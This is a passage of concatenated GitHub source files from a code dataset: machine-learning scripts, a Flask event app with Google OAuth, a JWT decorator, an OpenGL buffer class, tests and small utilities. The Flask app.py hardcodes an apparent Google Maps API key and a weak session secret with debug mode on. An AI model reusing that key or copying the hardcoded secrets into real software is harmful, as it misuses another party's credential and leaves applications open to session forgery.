test_size=0.2, random_state= 42)\n\nnum_transformer = Pipeline(steps=[\n (\"imputer\", SimpleImputer(strategy=\"mean\")),\n (\"scaler\", StandardScaler())\n])\n\n\npreprocess = ColumnTransformer(transformers=[\n ('num_feature', num_transformer, [\"Pregnancies\",\"Glucose\",\"BloodPressure\",\"SkinThickness\",\"Insulin\",\"BMI\",\"DiabetesPedigreeFunction\",\"Age\"])\n])\n\ncls = Pipeline(steps=[\n (\"preprocess\", preprocess), \n ('model', SVC())\n])\n\nparam_grid = {\n 'model__C': [1, 2, 3],\n 'model__kernel': ['linear', 'poly', 'rbf', 'sigmoid'],\n \"preprocess__num_feature__imputer__strategy\": ['mean', 'median']\n}\n\ncls_cv = GridSearchCV(cls, param_grid, verbose= 1, n_jobs=4, scoring=\"accuracy\",cv = 6)\n#cls = SVC()\ncls_cv.fit(x_train, y_train)\n# save model using pickle\n#pickle.dump(cls, open('svc_model.pkl', 'wb')) # wr: write binary\n\n# load model\n#model = pickle.load(open('svc_model.pkl', 'rb'))\n#y_predict = model.predict(x_test)\n\ny_predict = cls_cv.predict(x_test)\n\n\nprint(cls_cv.best_estimator_)\nprint(cls_cv.best_score_)\nprint(cls_cv.best_params_)\n\n\nfor i, j in zip(y_test, y_predict):\n print('y_true',i, 'y_pred', j)\n\n\n\n# print(cls.support_)\n# print(cls.support_vectors_)\n# classifier report\nprint('----- classifier report -------------')\nprint(classification_report(y_test, y_predict))\n\n# confusion matrix\nprint('----- confusion matrix -------------')\nprint(confusion_matrix(y_test, y_predict))\n","repo_name":"khuchuuanh/Machine-learning","sub_path":"classifier_algorithms/svc.py","file_name":"svc.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"43566754356","text":"import pymongo\n\nMONGO_CONNECTION_STRING = 'mongodb://localhost:27017'\nMONGO_DB_NAME = 'movies'\nMONGO_COLLECTION_NAME = 'movies'\nclient = pymongo.MongoClient(MONGO_CONNECTION_STRING)\ndb = client['movies']\ncollection = db['movies']\n\nprint('find 方法 多条查询')\nresults = collection.find()\nprint(results)\nfor result in results:\n print(result)\n\nprint(\"计数\")\ncount = collection.find().count()\nprint(count)","repo_name":"yang5426/pythonCrawler","sub_path":"pthonCrawler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42919099051","text":"from flask import Flask, redirect, url_for, session, flash, render_template, request, abort\nfrom flask_oauth import OAuth\nfrom google import GoogleFactory\n# from provider import DataProvider\nfrom mongo import MongoProvider\nfrom pagination import Pagination\nimport googlemaps\nimport urllib\nimport locale\nimport json\nimport re\nimport sys\n\n# You must configure these 3 values from Google APIs console\n# https://code.google.com/apis/console\njson_data = open('client_secret.json').read()\nclient = json.loads(json_data)\n\nGOOGLE_CLIENT_ID = client['web']['client_id']\nGOOGLE_CLIENT_SECRET = client['web']['client_secret']\nREDIRECT_URI = '/authorized' # one of the Redirect URIs from Google APIs console\n\nSECRET_KEY = 'mysecretkeyisverysecret'\nDEBUG = True\nPER_PAGE = 6\napp = Flask(__name__)\napp.debug = DEBUG\napp.secret_key = SECRET_KEY\noauth = OAuth()\ngmaps = googlemaps.Client(key='AIzaSyC9Jw099A_9uXyK8KFQPxR93-cg3ks5E40')\ndb = MongoProvider('config.ini')\n# provider = DataProvider(mapClient=gmaps, mongo=db)\napi = GoogleFactory()\ngoogle = oauth.remote_app(\n\t'google',\n\tbase_url='https://www.google.com/accounts/',\n\tauthorize_url=client['web']['auth_uri'],\n\trequest_token_url=None,\n\trequest_token_params = {\n\t\t'scope': 'https://www.googleapis.com/auth/userinfo.email https://www.googleapis.com/auth/calendar',\n\t\t'response_type': 'code',\n\t},\n\taccess_token_url=client['web']['token_uri'],\n\taccess_token_method='POST',\n\taccess_token_params={'grant_type': 'authorization_code'},\n\tconsumer_key=GOOGLE_CLIENT_ID,\n\tconsumer_secret=GOOGLE_CLIENT_SECRET\n)\n\nlocale.setlocale(locale.LC_ALL, 'id_ID.UTF-8')\n\ndef makeLabel(index, name, address):\n\ttext = render_template(\n\t\t'map-label.var', name=name, address=address, index=index\n\t)\n\ttext = re.sub(' +', ' ', text.strip())\n\treturn text\n\ndef makeTitle(full_text):\n\ttext = [s.strip() for s in full_text.splitlines()]\n\ttext = text[0].split(\"|\")[0]\n\treturn text\n\ndef getProfile():\n\taccess_token = session.get('access_token')\n\tif access_token is None:\n\t\treturn None\n\n\taccess_token = access_token[0]\n\treq = api.make_request_info(access_token)\n\n\ttry:\n\t\tres = urllib.request.urlopen(req)\n\texcept urllib.error.HTTPError as e:\n\t\tif e.code == 401:\n\t\t\t# Unauthorized - bad token\n\t\t\tsession.pop('access_token', None)\n\t\t\tabort(401)\n\t\treturn None\n\treturn json.loads(res.read())\n\ndef getEntries(page, limit, data=None):\n\tif page < 1:\n\t\treturn []\n\toffset = (page - 1) * limit\n\tif data is None:\n\t\treturn db.getEntries(offset, limit)\n\ndef addEventToCalendar(data, title, date, location):\n\taccess_token = session.get('access_token')\n\tif access_token is None:\n\t\treturn redirect(url_for('signin', next=url_for('insert_calendar')))\n\n\taccess_token = access_token[0]\n\treq = api.make_request_calendar(access_token, data, title, date, location=location)\n\ttry:\n\t\tres = urllib.request.urlopen(req)\n\texcept urllib.error.HTTPError as e:\n\t\tflash(json.dumps(e.read()), \"error\")\n\t\tif e.code == 401:\n\t\t\t# Unauthorized - bad token\n\t\t\tsession.pop('access_token', None)\n\t\t\tabort(401)\n\t\treturn None\n\treturn json.loads(res.read())\n\n@app.route('/api/places', methods = ['POST'])\ndef get_place():\n\tdata = request.get_json()\n\t# print(data)\n\tresult = db.searchEventsByLocation(\n\t\t{'name': data['name'], 'address': data['address'], 'location': data['location']}\n\t)\n\tprint(result.count())\n\t# return json.dumps(list(result))\n\treturn render_template('sidelist.html', datas=result)\n\n@app.route('/featured', defaults={ 'page' : 1, 'limit' : PER_PAGE })\n@app.route('/featured/page/', defaults={ 'limit' : PER_PAGE })\n@app.route('/featured/page//limit/')\ndef home(page, limit):\n\tdata = db.getAll()\n\tcount = data.count()\n\tpagination = Pagination(page, limit, count)\n\tentries = getEntries(page, limit)\n\treturn render_template(\"featured.html\", pagination=pagination, datas=entries)\n\n@app.route('/detail/')\ndef detail(id=None):\n\tif id is None:\n\t\treturn abort(404)\n\n\tdata = db.getId(id)\n\tif data is None:\n\t\treturn abort(404)\n\n\tlocations = []\n\tlabels = []\n\tname_address = []\n\n\tif 'place' in data['entities'].keys():\n\t\tfor index, d in enumerate(data['entities']['place']):\n\t\t\tlocations.append(d['location'])\n\t\t\tname_address.append(\n\t\t\t\t{'name': d['name'], 'address': d['address'], 'location': d['location']}\n\t\t\t)\n\t\t\ttext = makeLabel(index, d['name'], d['address'])\n\t\t\tlabels.append(text)\n\n\treturn render_template('detail.html', data=data, locations=locations, labels=labels, name_address=name_address)\n\n@app.route('/upcoming')\ndef upcoming():\n\t# return list(db.getAllTimse())\n\tlocations = []\n\tlabels = []\n\tname_address = []\n\n\tdata = db.searchEventsByUpcoming().distinct('entities.place')\n\tfor index, d in enumerate(data):\n\t\tlocations.append(d['location'])\n\t\tname_address.append(\n\t\t\t{'name': d['name'], 'address': d['address'], 'location': d['location']}\n\t\t)\n\t\ttext = makeLabel(index, d['name'], d['address'])\n\t\tlabels.append(text)\n\n\treturn render_template('index.html', locations=locations, labels=labels, name_address=name_address) \n\n@app.route('/')\n@app.route('/search/')\ndef index(query=None):\n\tif session.get('url'):\n\t\turl = session.pop('url', None)\n\t\treturn redirect(url)\n\n\tlocations = []\n\tlabels = []\n\tname_address = []\n\t\n\tif query is None:\n\t\tdata = db.getAllPlace()\n\t\tfor index, d in enumerate(data):\n\t\t\tlocations.append(d['location'])\n\t\t\tname_address.append(\n\t\t\t\t{'name': d['name'], 'address': d['address'], 'location': d['location']}\n\t\t\t)\n\t\t\ttext = makeLabel(index, d['name'], d['address'])\n\t\t\tlabels.append(text)\n\telse:\n\t\tdata = gmaps.places(query=query)\n\t\tfor index, d in enumerate(data['results']):\n\t\t\tlocations.append(d['geometry']['location'])\n\t\t\tname_address.append(\n\t\t\t\t{'name': d['name'], 'address': d['formatted_address'], 'location': d['geometry']['location']}\n\t\t\t)\n\t\t\ttext = makeLabel(index, d['name'], d['formatted_address'])\n\t\t\tlabels.append(text)\n\t\t\t\n\t# datas = db.getEntries(0, 6)\n\t\n\t# return json.dumps(name_address)\n\treturn render_template('index.html', locations=locations, labels=labels, name_address=name_address) \n\n@app.route('/signin')\ndef signin():\n\turl = request.args.get('next', url_for('index'))\n\taccess_token = session.get('access_token')\n\tif access_token is None:\n\t\tsession['url'] = url\n\t\treturn redirect(url_for('login'))\n\treturn redirect(url)\n\n@app.route('/add_reminder/')\ndef insert_calendar(id):\n\turl = request.args.get('next', url_for('index'))\n\tdata = db.getId(id)\n\tif 'name' in data['entities'].keys():\n\t\ttitle = data['entities']['name'][0]\n\telse:\n\t\ttitle = makeTitle(data['full_text'])\n\n\tif 'place' in data['entities'].keys():\n\t\tlocation = data['entities']['place'][0]['name']\n\telse:\n\t\tlocation = None\n\n\tif 'time' in data['entities'].keys():\n\t\tfor date in data['entities']['time']:\n\t\t\tsuccess = addEventToCalendar(data, title, date, location)\n\t\t\tmessage = 'Event has been added! Please check your Calendar '.format(date.year, date.month, date.day)\n\t\t\tflash(message)\n\t\t\tif success is None:\n\t\t\t\tflash(\"Event fail to add (1)\", \"error\")\n\t\t\t\treturn redirect(url_for('index'))\n\telse:\n\t\tflash(\"Event fail to add (0)\", \"error\")\n\t\treturn redirect(url_for('index'))\n\t\n\treturn redirect(url)\n\n@app.route('/login')\ndef login():\n\tcallback = url_for('authorized', _external=True)\n\treturn google.authorize(callback=callback)\n\n@app.route('/logout')\ndef logout():\n\turl = request.args.get('next', url_for('index'))\n\tsession.pop('access_token', None)\n\tsession.pop('profile_name', None)\n\tsession.pop('profile_picture', None)\n\tsession.pop('email', None)\n\tflash('You were successfully logged out')\n\treturn redirect(url)\n\n@app.route(REDIRECT_URI)\n@google.authorized_handler\ndef authorized(resp):\n\taccess_token = resp['access_token']\n\tsession['access_token'] = access_token, ''\n\tprofile = getProfile()\n\tif profile is not None:\n\t\tsession['profile_name'] = profile['name']\n\t\tsession['profile_picture'] = profile['picture']\n\t\tsession['email'] = profile['email']\n\telse:\n\t\tsession.pop('profile_name', None)\n\t\tsession.pop('profile_picture', None)\n\t\tsession.pop('email', None)\n\tflash('You were successfully logged in')\n\tif 'url' in session:\n\t\treturn redirect(session['url'])\n\treturn redirect(url_for('index'))\n\n@google.tokengetter\ndef get_access_token():\n\treturn session.get('access_token')\n\n\n@app.context_processor\ndef context_processor():\n\tdef url_for_other_page(page):\n\t\targs = request.view_args.copy()\n\t\targs['page'] = page\n\t\treturn url_for(request.endpoint, **args)\n\n\treturn dict(url_for_other_page=url_for_other_page)\n\ndef main():\n\tapp.run()\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"dewzzjr/citivis-event","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7900550071","text":"from collections import Counter\ndef solution(id_list, report, k):\n answer = []\n chk = []\n\n dic = {}\n for i in id_list:\n dic[i] = []\n\n for case in report:\n report_id, report_name = case.split()\n if report_name not in dic[report_id]:\n dic[report_id].append(report_name)\n chk.append(report_name)\n\n counter = Counter(chk)\n\n for report_id in id_list:\n a = [i for i in dic[report_id] if counter[i] >= k]\n answer.append(len(a))\n\n return answer\n\n\n# id_list, report, k = [\"con\", \"ryan\"],[\"ryan con\", \"ryan con\", \"ryan con\", \"ryan con\"], 3\nid_list, report, k = [\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\",\"apeach frodo\",\"frodo neo\",\"muzi neo\",\"apeach muzi\"],2\nprint(solution(id_list, report, k))\n#https://somjang.tistory.com/entry/Programmers-2022-KAKAO-BLIND-RECRUITMENT-%EC%8B%A0%EA%B3%A0-%EA%B2%B0%EA%B3%BC-%EB%B0%9B%EA%B8%B0-Python","repo_name":"GayeonKimm/CT","sub_path":"Programmers/1_level/신고 결과 받기.py","file_name":"신고 결과 받기.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23571007740","text":"import logging\nfrom functools import wraps\n\nfrom jose import ExpiredSignatureError, JWTError, jwt\nfrom jose.jwt import get_unverified_claims\n\nfrom challenge.application.helpers import create_jwt_key\nfrom challenge.application.models import Application\nfrom challenge.exceptions.api import Unauthorized\n\nlogger = logging.getLogger(__name__)\n\n\ndef auth_required(method):\n\n @wraps(method)\n def wrapper(self, *args, **kwargs):\n\n token = _get_header_token(self)\n payload = _get_token_claims(token)\n application = _get_application(payload)\n\n key = create_jwt_key(application)\n _validate_signature(application, token, key)\n\n return method(self, *args, **kwargs)\n\n return wrapper\n\n\ndef _get_header_token(view):\n authorization_header = view.request.headers.get('Authorization', '')\n if 'Bearer' not in authorization_header:\n raise Unauthorized(message='Invalid authorization header.')\n\n return authorization_header.replace('Bearer', '').strip()\n\n\ndef _get_token_claims(token):\n try:\n return get_unverified_claims(token)\n except JWTError:\n raise Unauthorized(message='Invalid token.')\n\n\ndef _get_application(payload):\n try:\n return Application.objects.get(id=payload['id'], is_active=True)\n except KeyError:\n logger.info('Invalid token.')\n raise Unauthorized(message='Invalid token.')\n except Application.DoesNotExist:\n logger.info(f'Application {payload[\"id\"]} not found.')\n raise Unauthorized()\n\n\ndef _validate_signature(application, token, key):\n try:\n jwt.decode(token, key)\n except ExpiredSignatureError:\n raise Unauthorized(message='Expired token.')\n except JWTError:\n logger.info(f'Failed to authenticate {application}.')\n raise Unauthorized()\n","repo_name":"Gamboua/challenge_labs","sub_path":"src/challenge/application/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"10616000082","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, generators, print_function, with_statement\nimport ctypes\nfrom ctypes import c_int, c_uint, byref, POINTER\nimport numpy\nimport pyglet.gl\nfrom pyglet import gl\n\n\n__all__ = ['GLBuffer']\n\n\nc_intp = POINTER(c_int)\nc_uintp = POINTER(c_uint)\n\n\nclass _GLBufferContext(object):\n '''A context manager which binds an OpenGL buffer on entry\n and restores state on exit.'''\n\n\n def __init__(self, bufid):\n '''bufid - a valid OpenGL buffer object id'''\n\n self.bufid = bufid\n self.previd = c_uint(0)\n self.entrycount = 0\n\n\n def __enter__(self):\n if self.entrycount == 0:\n gl.glGetIntegerv(gl.GL_ARRAY_BUFFER_BINDING, ctypes.cast(byref(self.previd), c_intp))\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.bufid)\n self.entrycount += 1\n\n\n def __exit__(self, exc_type, exc_value, traceback):\n self.entrycount -= 1\n if self.entrycount == 0:\n gl.glBindBuffer(gl.GL_ARRAY_BUFFER, self.previd)\n\n\nclass GLBuffer(object):\n '''Abstracts an OpenGL buffer object with a defined datatype.\n Automatically resizes when adding data.'''\n\n def __init__(self, size=0, dtype=numpy.float32, usage=gl.GL_DYNAMIC_DRAW):\n '''\n size - how much storage to allocate for this buffer in advance (in items, not bytes)\n dtype - type of items in storage (float, float16, float32, int, etc.)\n usage - one of GL_{STREAM,STATIC,DYNAMIC}_{READ,COPY,DRAW}\n Description copied from OpenGL reference pages:\n\n The frequency of access may be one of these:\n STREAM\n The data store contents will be modified once and used at most a few times.\n STATIC\n The data store contents will be modified once and used many times.\n DYNAMIC\n The data store contents will be modified repeatedly and used many times.\n\n The nature of access may be one of these:\n\n DRAW\n The data store contents are modified by the application,\n and used as the source for GL drawing and image specification commands.\n READ\n The data store contents are modified by reading data from the GL,\n and used to return that data when queried by the application.\n COPY\n The data store contents are modified by reading data from the GL,\n and used as the source for GL drawing and image specification commands.'''\n\n self.usage = usage\n self.dtype = numpy.dtype(dtype)\n bufid = ctypes.c_uint(0)\n gl.glGenBuffers(1, ctypes.byref(bufid))\n self.bufid = bufid\n self.bound = _GLBufferContext(self.bufid)\n if size > 0:\n with self.bound:\n gl.glBufferData(gl.GL_ARRAY_BUFFER, size * self.dtype.itemsize,\n None, self.usage)\n\n\n def __len__(self):\n with self.bound:\n size = c_int(0)\n gl.glGetBufferParameteriv(gl.GL_ARRAY_BUFFER, gl.GL_BUFFER_SIZE, byref(size))\n return size.value // self.dtype.itemsize\n\n\n def __getitem__(self, key):\n with self.bound:\n if isinstance(key, slice):\n start = int(key.start)\n stop = int(key.stop)\n else:\n start = int(key)\n stop = start + 1\n sz = len(self)\n if start < 0 or start >= sz or stop < 0 or stop > sz or start >= stop:\n raise IndexError\n shape = (stop - start,)\n a = numpy.empty(shape=shape, dtype=self.dtype)\n gl.glGetBufferSubData(gl.GL_ARRAY_BUFFER, start * self.dtype.itemsize,\n (stop - start) * self.dtype.itemsize, a.ctypes.data)\n return a\n\n\n def __setitem__(self, key, value):\n with self.bound:\n sz = len(self)\n if isinstance(key, slice):\n start = int(key.start) if key.start is not None else 0\n stop = int(key.stop) if key.stop is not None else start + value.size\n else:\n start = int(key)\n stop = start + 1\n if start < 0 or stop < 0 or start >= stop:\n raise IndexError\n if stop > sz:\n newsz = max(sz * 2, stop)\n a = numpy.empty((newsz,), dtype=self.dtype)\n # intel dies when querying an empty buffer :[\n if sz > 0:\n gl.glGetBufferSubData(gl.GL_ARRAY_BUFFER, 0,\n sz * self.dtype.itemsize,\n a.ctypes.data)\n b = numpy.asarray(value).reshape(-1)\n a[start:stop] = b\n gl.glBufferData(gl.GL_ARRAY_BUFFER, newsz * self.dtype.itemsize,\n a.ctypes.data, self.usage)\n else:\n a = numpy.ascontiguousarray(value, self.dtype).reshape(-1)\n sz = min((stop - start), len(a))\n gl.glBufferSubData(gl.GL_ARRAY_BUFFER, start * self.dtype.itemsize,\n sz * self.dtype.itemsize, a.ctypes.data)\n","repo_name":"moshev/project-viking","sub_path":"src/util/glbuffer.py","file_name":"glbuffer.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"16330391292","text":"# -*- coding: utf-8 -*-\nimport io\n\nfrom setuptools import find_packages, setup\nfrom ATE import __version__\n\n# =============================================================================\n# Use Readme for long description\n# =============================================================================\nwith io.open('README.md', encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nsetup(\n name=\"Semi-ATE\",\n version=__version__,\n description=\"Framework for Semiconductor ATE testing projects\",\n long_description=LONG_DESCRIPTION,\n author=\"The Semi-ATE Project Contributors\",\n author_email=\"ate.organization@gmail.com\",\n license=\"GPL2\",\n keywords=\"Semiconductor ATE Automatic Test Equipment\",\n platforms=[\"Windows\", \"Linux\", \"Mac OS-X\"],\n packages=find_packages(),\n include_package_data=True,\n classifiers=[\n 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',\n 'Operating System :: MacOS',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: POSIX :: Linux',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: Education',\n 'Intended Audience :: Science/Research',\n 'Intended Audience :: Developers',\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)',\n 'Topic :: Scientific/Engineering :: Human Machine Interfaces',\n 'Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator',\n 'Topic :: Software Development :: Build Tools',\n 'Topic :: Software Development :: Code Generators',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: Quality Assurance',\n ],\n entry_points={\n \"spyder.plugins\": [\n \"ate = ATE.spyder.plugin:ATE\",\n ]\n }\n)\n","repo_name":"HessTobias/Semi-ATE","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"29490323213","text":"from symsynd import demangle_swift_symbol, demangle_cpp_symbol\n\n\ndef test_swift_demangle():\n mangled = '_TFC12Swift_Tester14ViewController11doSomethingfS0_FT_T_'\n expected = (\n 'Swift_Tester.ViewController.doSomething '\n '(Swift_Tester.ViewController) -> () -> ()'\n )\n assert demangle_swift_symbol(mangled) == expected\n\n\ndef test_swift_demangle_options():\n mangled = (\n '_TTWVSC29UIApplicationLaunchOptionsKeys21_ObjectiveCBridgeable'\n '5UIKitZFS0_36_unconditionallyBridgeFromObjectiveCfGSqwx15_'\n 'ObjectiveCType_x'\n )\n default_expected = (\n u'protocol witness for static Swift._ObjectiveCBridgeable._'\n u'unconditionallyBridgeFromObjectiveC (Swift.Optional) -> A in conformance __C.'\n u'UIApplicationLaunchOptionsKey : Swift._ObjectiveCBridgeable '\n u'in UIKit'\n )\n simplified_expected = (\n u'protocol witness for static _ObjectiveCBridgeable._'\n u'unconditionallyBridgeFromObjectiveC(A._ObjectiveCType?) -> '\n u'A in conformance UIApplicationLaunchOptionsKey'\n )\n\n assert demangle_swift_symbol(mangled) == default_expected\n assert demangle_swift_symbol(mangled, simplified=True) == simplified_expected\n\n\ndef test_cpp_demangle():\n mangled = '_ZN6google8protobuf2io25CopyingInputStreamAdaptor4SkipEi'\n expected = 'google::protobuf::io::CopyingInputStreamAdaptor::Skip(int)'\n assert demangle_cpp_symbol(mangled) == expected\n\n\ndef test_demangle_failure_underscore():\n mangled = '_some_name'\n assert demangle_swift_symbol(mangled) is None\n\n\ndef test_demangle_failure_no_underscore():\n mangled = 'some_other_name'\n assert demangle_swift_symbol(mangled) is None\n","repo_name":"getsentry/symsynd","sub_path":"tests/test_demangle.py","file_name":"test_demangle.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"48"} +{"seq_id":"37492524453","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nimport positionProvider\n\n\nclass api_root(Resource):\n def get(self):\n print('holdingProvider!')\n return {'src': 'version 0.0.1'}\n\n\nclass api_holding(Resource):\n def get(self):\n try:\n p = positionProvider.Position()\n h = p.getHolding()\n result = p.getHoldingJosn()\n except (Exception) as err:\n print(err)\n\n return result\n\ndef main():\n app = Flask(__name__)\n api = Api(app)\n api.add_resource(api_root, '/')\n api.add_resource(api_holding, '/holdings')\n app.run(host=\"0.0.0.0\", port=int(\"80\"), debug=True)\n\nif __name__ == '__main__':\n\n print ('test')\n main()\n","repo_name":"joeycmlam/pyHoldingProvider","sub_path":"src/wbServices.py","file_name":"wbServices.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2849063485","text":"\"\"\"Import all necessary packages\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import (\n split as _split,\n mean as _mean,\n sum as _sum,\n col as _col,\n when,\n isnan,\n count,\n)\nfrom pyspark.ml.feature import Imputer\n\nspark = SparkSession\\\n .builder\\\n .appName('Exercise1')\\\n .getOrCreate()\n\n# Load data as data frame and keep column names + data types\n# from original data set with head = True and inferSchema = True\n# Add escape option to ignore \" in the csv text\ndf_pyspark = spark.read\\\n .option(\"escape\",\"\\\"\")\\\n .csv('titanic.csv', header = True, inferSchema = True)\n\n\"\"\"\n# First look at the data, columns and data types\n\nprint((df_pyspark.count(), len(df_pyspark.columns)))\ndf_pyspark.show()\nprint(df_pyspark.printSchema())\nprint(df_pyspark.columns)\nprint(df_pyspark.dtypes)\ndf_pyspark.describe().show()\n\n# Find out how many missing values each column has\ndf_pyspark.select([count(when(isnan(c) | _col(c).isNull(), c))\\\n .alias(c) for c in df_pyspark.columns]).show()\n\nprint((df_pyspark.count(), len(df_pyspark.columns))) # Check shape before shaping\n\"\"\"\n\n# Drop not needed columns and replace/rename missing values\ndf_pyspark = df_pyspark.drop('Ticket') # Not necessary for my intentions\ndf_pyspark = df_pyspark.na.drop(how = 'any', thresh = 10) # Drop rows with at least two NA values\ndf_pyspark = df_pyspark.na.drop(how = 'any', subset = ['Cabin']) # Drop rows with missing values\n # in cabin column\n# Replace missing age values by median\nimputer = Imputer(\n inputCols = ['Age'],\n outputCols = ['{}_imputed'.format(c) for c in ['Age']]\n ).setStrategy('median')\ndf_pyspark = imputer.fit(df_pyspark).transform(df_pyspark)\ndf_pyspark = df_pyspark.drop('Age') # Drop old Age column\n\ndf_pyspark = df_pyspark.na.fill('unknown') # Replace NA values in Embarked with description 'unknown'\n\n# Generate and add new interesting columns\nfamily_column = when((_col('SibSp') > 0) | (_col('Parch') > 0), True).otherwise(False)\ndf_pyspark = df_pyspark.withColumn('Family', family_column)\\\n .withColumn('FamilySize', df_pyspark['SibSp'] + df_pyspark['Parch'])\n\n# Rename columns for better understanding\ndf_pyspark = df_pyspark.withColumnRenamed('Family', 'isFamily') # Because only boolean\ndf_pyspark = df_pyspark.withColumnRenamed('SibSp', 'NumberOfSibOrSp')\\\n .withColumnRenamed('Parch', 'NumberOfParOrChild')\\\n .withColumnRenamed('Pclass', 'Class')\ndf_pyspark = df_pyspark.withColumnRenamed('Age_imputed', 'Age') # Change name back to Age\n\n# Filter for only fare above null and isFamily = true rows, then drop is family\ndf_pyspark = df_pyspark.filter('Fare > 0')\n\n# Split Name column into title, firstname and lastname\ndf_pyspark = df_pyspark.withColumn('Lastname', _split(_col('Name'), ', ').getItem(0))\\\n .withColumn('TitleFirstname', _split(_col('Name'), ', ').getItem(1))\ndf_pyspark = df_pyspark.withColumn('Title', _split(_col('TitleFirstname'), '. ').getItem(0))\\\n .withColumn('Firstname', _split(_col('TitleFirstname'), '\\ ').getItem(1))\n\n# Rearrange, select columns and sort by age\ndf_pyspark = df_pyspark.select('PassengerId', 'Title', 'Firstname', 'Lastname', 'Sex', 'Age', \\\n 'Survived', 'Class', 'Embarked', 'Fare', 'Cabin', 'isFamily', \\\n 'FamilySize', 'NumberOfSibOrSp', 'NumberOfParOrChild').sort('Age')\n\n# Find interesting values\nfamily_fares = df_pyspark.groupBy('Lastname').agg(_sum('Fare'))\ndeath_rate_by_families = df_pyspark.groupBy('Lastname').agg(_mean('Survived'))\ndeath_rate_by_gender = df_pyspark.groupBy('Sex').agg(_mean('Survived'))\ndeath_rate_by_title = df_pyspark.groupBy('Title').agg(_mean('Survived'))\ndeath_rate_by_class = df_pyspark.groupBy('Class').agg(_mean('Survived'))\ndeath_rate_by_cabin = df_pyspark.groupBy('Cabin').agg(_mean('Survived'))\nmean_survivor_age = df_pyspark.groupBy('Survived').agg(_mean('Age'))\n\n#family_fares.show()\n#death_rate_by_families.show()\n#death_rate_by_gender.show()\n#death_rate_by_title.show()\n#death_rate_by_class.show()\n#death_rate_by_cabin.show()\n#mean_survivor_age.show()\n#df_pyspark.show()\n\n#print((df_pyspark.count(), len(df_pyspark.columns))) # Check shape after shaping\n\n# Save new data frame as csv\n\n# Save each partition individually -> slicing bigger csv file for better scaling\ndf_pyspark.write.csv('titanic_family_refined.csv')\n# Bundle partitions\ndf_pyspark.repartition(1).write.format(\"com.databricks.spark.csv\")\\\n .option(\"header\", \"true\").save(\"titanic_family_refined2.csv\")\n\"\"\"\n# Alternatives\ndf_pyspark.coalesce(1).write.format(\"com.databricks.spark.csv\")\\\n .option(\"header\", \"true\").save(\"titanic_family_refined3.csv\")\ndf_pyspark.toPandas().to_csv('titanic_family_refined4.csv') # Save as single csv file\n\"\"\"\n\n# Stopping Spark Session and freeing potential cluster resources\nspark.stop()\n","repo_name":"SamiHaddouti/Pyspark-Data-Shaping","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35076673189","text":"from ipynta.predicates import BasePred\r\nfrom os import path\r\nimport pytest\r\n\r\nSAMPLES_DIR = path.dirname(path.dirname(path.abspath(__file__))) + \"/imgs\"\r\n\r\n\r\ndef test_base_pred_constructor():\r\n try:\r\n BasePred()\r\n except Exception:\r\n pytest.fail(\"BasePred constructor failed\")\r\n\r\ndef test_base_pred_execute_empty():\r\n pred = BasePred()\r\n input = []\r\n output = pred.execute(input)\r\n\r\n assert(len(output) == 0)","repo_name":"allanchua101/ipynta","sub_path":"src/tests/predicates/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"70676438865","text":"import click\n\nimport pandas as pd\n\n\n@click.command()\n@click.argument(\n \"input_tsvs\",\n nargs=-1,\n type=click.Path(exists=True, readable=True),\n required=True,\n)\n@click.argument(\"merged_tsv\", nargs=1, type=click.Path(), required=True)\ndef merge(input_tsvs, merged_tsv) -> None:\n \"\"\"Merge multiple tsvs into a single tsvs\"\"\"\n index_columns = [\"#CHROM\", \"POS\", \"ID\", \"REF\", \"ALT\"]\n dfs = [\n pd.read_csv(input_tsv, sep=\"\\t\", index_col=index_columns)\n for input_tsv in input_tsvs\n ]\n df_merged = pd.concat(dfs, axis=1)\n df_merged.to_csv(merged_tsv, sep=\"\\t\")\n\n\nif __name__ == \"__main__\":\n 